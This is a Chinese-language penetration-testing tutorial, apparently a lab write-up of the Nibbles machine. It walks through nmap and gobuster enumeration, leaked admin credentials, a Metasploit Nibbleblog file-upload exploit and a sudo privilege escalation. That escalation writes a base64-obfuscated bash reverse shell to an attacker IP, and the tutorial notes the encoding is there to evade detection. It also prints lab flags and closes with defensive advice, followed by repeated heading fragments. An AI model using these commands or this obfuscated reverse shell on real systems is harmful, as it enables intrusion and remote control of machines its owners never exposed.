Nibbleblog 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

目标IP: 10.10.10.75<\/code><\/p>

开放端口:<\/p>


22\/tcp (SSH) - OpenSSH 7.2p2 Ubuntu 4ubuntu2.2<\/li>
80\/tcp (HTTP) - Apache httpd 2.4.18 (Ubuntu)<\/li>
<\/ul>
Nmap扫描命令:<\/p>
nmap -p- 10.10.10.75 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>1.2 Web服务枚举<\/h3>
发现网站根目录没有有用信息:<\/p>
curl http:\/\/10.10.10.75
<\/span><\/span><\/code><\/pre>使用Gobuster进行目录扫描:<\/p>
gobuster dir -u "http:\/\/10.10.10.75\/nibbleblog"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words.txt -x html,txt,php -b 404,403 -t 50<\/span>
<\/span><\/span><\/code><\/pre>发现关键路径:<\/p>

\/nibbleblog\/update.php<\/code><\/li>
\/nibbleblog\/content\/private\/users.xml<\/code><\/li>
<\/ul>
2. 漏洞利用<\/h2>
2.1 识别漏洞<\/h3>
使用searchsploit查找Nibbleblog漏洞:<\/p>
searchsploit Nibbleblog
<\/span><\/span><\/code><\/pre>发现可利用的漏洞:<\/p>

exploit\/multi\/http\/nibbleblog_file_upload<\/code><\/li>
<\/ul>
2.2 获取凭据<\/h3>
在\/nibbleblog\/content\/private\/users.xml<\/code>中找到管理员凭据:<\/p>
username: admin
password: nibbles
<\/code><\/pre>
2.3 使用Metasploit利用漏洞<\/h3>
Metasploit配置:<\/p>
use exploit\/multi\/http\/nibbleblog_file_upload
set LHOST 10.10.16.14
set PASSWORD nibbles
set USERNAME admin
set TARGETURI \/nibbleblog
run
<\/code><\/pre>
3. 后渗透阶段<\/h2>
3.1 获取用户权限<\/h3>
找到user flag:<\/p>
895e7888ead0ee3699b05fcd82ae8a4e
<\/code><\/pre>
3.2 权限提升<\/h3>
检查sudo权限:<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>创建提权脚本:<\/p>
mkdir -p \/home\/nibbler\/personal\/stuff
<\/span><\/span>echo 'L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE0LzEwMDM1IDA+JjEiCg=='<\/span>|base64 -d >\/home\/nibbler\/personal\/stuff\/monitor.sh
<\/span><\/span>chmod +x \/home\/nibbler\/personal\/stuff\/monitor.sh
<\/span><\/span><\/code><\/pre>执行提权:<\/p>
sudo \/home\/nibbler\/personal\/stuff\/monitor.sh
<\/span><\/span><\/code><\/pre>获取root flag:<\/p>
c7d95df1cb6437197c6ae40bcce2bdc5
<\/code><\/pre>
4. 技术要点总结<\/h2>

目录枚举<\/strong>：使用Gobuster发现隐藏的Nibbleblog目录是关键突破口<\/li>
敏感文件泄露<\/strong>：users.xml<\/code>文件泄露了管理员凭据<\/li>
已知漏洞利用<\/strong>：Nibbleblog的文件上传漏洞可通过Metasploit利用<\/li>
权限提升<\/strong>：通过sudo权限执行自定义脚本实现提权<\/li>
Base64编码<\/strong>：提权脚本使用Base64编码绕过可能的检测<\/li>
<\/ol>
5. 防御建议<\/h2>

限制敏感文件访问权限<\/li>
及时更新CMS系统<\/li>
限制sudo权限范围<\/li>
监控文件上传功能<\/li>
实施最小权限原则<\/li>
<\/ol>

Nibbleblog 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞利用<\/h2>

3. 后渗透阶段<\/h2>

5. 防御建议<\/h2> 限制敏感文件访问权限<\/li> 及时更新CMS系统<\/li> 限制sudo权限范围<\/li> 监控文件上传功能<\/li> 实施最小权限原则<\/li> <\/ol>

5. 防御建议<\/h2>

限制敏感文件访问权限<\/li>
及时更新CMS系统<\/li>
限制sudo权限范围<\/li>
监控文件上传功能<\/li>
实施最小权限原则<\/li> <\/ol>